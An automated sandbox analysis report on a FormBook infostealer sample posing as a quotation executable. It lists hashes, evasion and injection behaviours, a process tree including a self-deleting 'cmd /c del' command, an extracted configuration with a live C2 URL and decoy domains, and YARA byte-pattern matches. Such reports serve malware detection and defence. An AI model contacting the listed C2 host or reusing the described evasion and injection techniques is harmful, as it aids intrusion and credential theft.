Play interactive tour

Edit tour

Windows Analysis Report quotation New Order I5117.exe

Overview

General Information

Sample Name:	quotation New Order I5117.exe
Analysis ID:	549969
MD5:	a45506feaa8bc01b90ecc3204bc45b6e
SHA1:	04abf27e6e718aef274dd5cbbc0184334e84469e
SHA256:	9f5649294d8a9d4cc583e6bbcb11d8287e02f5221d3f7be4109048271f1112c2
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Self deletion via cmd delete

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

quotation New Order I5117.exe (PID: 6380 cmdline: "C:\Users\user\Desktop\quotation New Order I5117.exe" MD5: A45506FEAA8BC01B90ECC3204BC45B6E)

quotation New Order I5117.exe (PID: 6800 cmdline: C:\Users\user\Desktop\quotation New Order I5117.exe MD5: A45506FEAA8BC01B90ECC3204BC45B6E)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 6500 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 5496 cmdline: /c del "C:\Users\user\Desktop\quotation New Order I5117.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.myveguiolcusbyopappgroup.com/n8bs/"], "decoy": ["monese-bank.com", "silkypumps.xyz", "tashabouvier.com", "eduardoleonsilva.com", "pinnaclecorporaterentals.com", "megafluids.com", "worldwidecarfans.com", "benjamlnesq.com", "unitedraxiapp.com", "thetanheroes.com", "jypmore.quest", "indianasheriffs.biz", "saintinstead.com", "alldansmx.com", "trulyproofreading.com", "indotogel369.com", "mermadekusse.store", "radosenterprisellc.com", "gseequalservices.com", "techride.xyz", "2031corp.com", "centelytics.com", "payperlivecalls.com", "iphone13promax.guide", "leadslingerstraining.com", "generateideasint.com", "afgelocal2741.com", "n-visionlearning.com", "strumagokart.quest", "noisesocial.com", "completefilmguide.com", "mawuyrapaulin.com", "heptagonfx.com", "hype-clicks.com", "uxog0.online", "932381.com", "trumpetrofnky.xyz", "samudombang.com", "hairtederionos.com", "10karmy.com", "nangniubanchanviet.online", "brooklynprowellness.com", "rockstarcleaningclub.com", "rollnwin.top", "breastextra.com", "zahad-riedel.com", "xuebqufvcdbgbqypuywgntpy.store", "blogging2success.com", "cnshippingagency.com", "danielquasar.net", "allthingsdog.info", "legaltulsa.com", "pure-impression.store", "jonbeedle.com", "ndtailgateofchampions.com", "steelhorserescue.com", "smart-realy.com", "rebornmkt.com", "zaktheme.xyz", "myfranciscanshoe.com", "linkedinupdate.com", "fulviopires.com", "magicspaces.digital", "avtoshop761.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.300985845.0000000003301000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x5c9b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x5cd42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x857d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x85b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xad5f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xad982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x68a55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x91875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb9695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x68541:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x91361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb9181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x68b57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x91977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb9797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x68ccf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x91aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb990f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x5d75a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8657a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xae39a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae79:$sqlite3step: 68 34 1C 7B E1 0x6af8c:$sqlite3step: 68 34 1C 7B E1 0x93c99:$sqlite3step: 68 34 1C 7B E1 0x93dac:$sqlite3step: 68 34 1C 7B E1 0xbbab9:$sqlite3step: 68 34 1C 7B E1 0xbbbcc:$sqlite3step: 68 34 1C 7B E1 0x6aea8:$sqlite3text: 68 38 2A 90 C5 0x6afcd:$sqlite3text: 68 38 2A 90 C5 0x93cc8:$sqlite3text: 68 38 2A 90 C5 0x93ded:$sqlite3text: 68 38 2A 90 C5 0xbbae8:$sqlite3text: 68 38 2A 90 C5 0xbbc0d:$sqlite3text: 68 38 2A 90 C5 0x6aebb:$sqlite3blob: 68 53 D8 7F 8C 0x6afe3:$sqlite3blob: 68 53 D8 7F 8C 0x93cdb:$sqlite3blob: 68 53 D8 7F 8C 0x93e03:$sqlite3blob: 68 53 D8 7F 8C 0xbbafb:$sqlite3blob: 68 53 D8 7F 8C 0xbbc23:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.301124869.00000000033C9000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: quotation New Order I5117.exe PID: 6380	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.0.quotation New Order I5117.exe.400000.8.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.0.quotation New Order I5117.exe.400000.8.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.quotation New Order I5117.exe.400000.8.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
12.0.quotation New Order I5117.exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.0.quotation New Order I5117.exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.quotation New Order I5117.exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
12.2.quotation New Order I5117.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.2.quotation New Order I5117.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.2.quotation New Order I5117.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
12.0.quotation New Order I5117.exe.400000.8.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.0.quotation New Order I5117.exe.400000.8.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.quotation New Order I5117.exe.400000.8.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
1.2.quotation New Order I5117.exe.333b288.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
12.0.quotation New Order I5117.exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
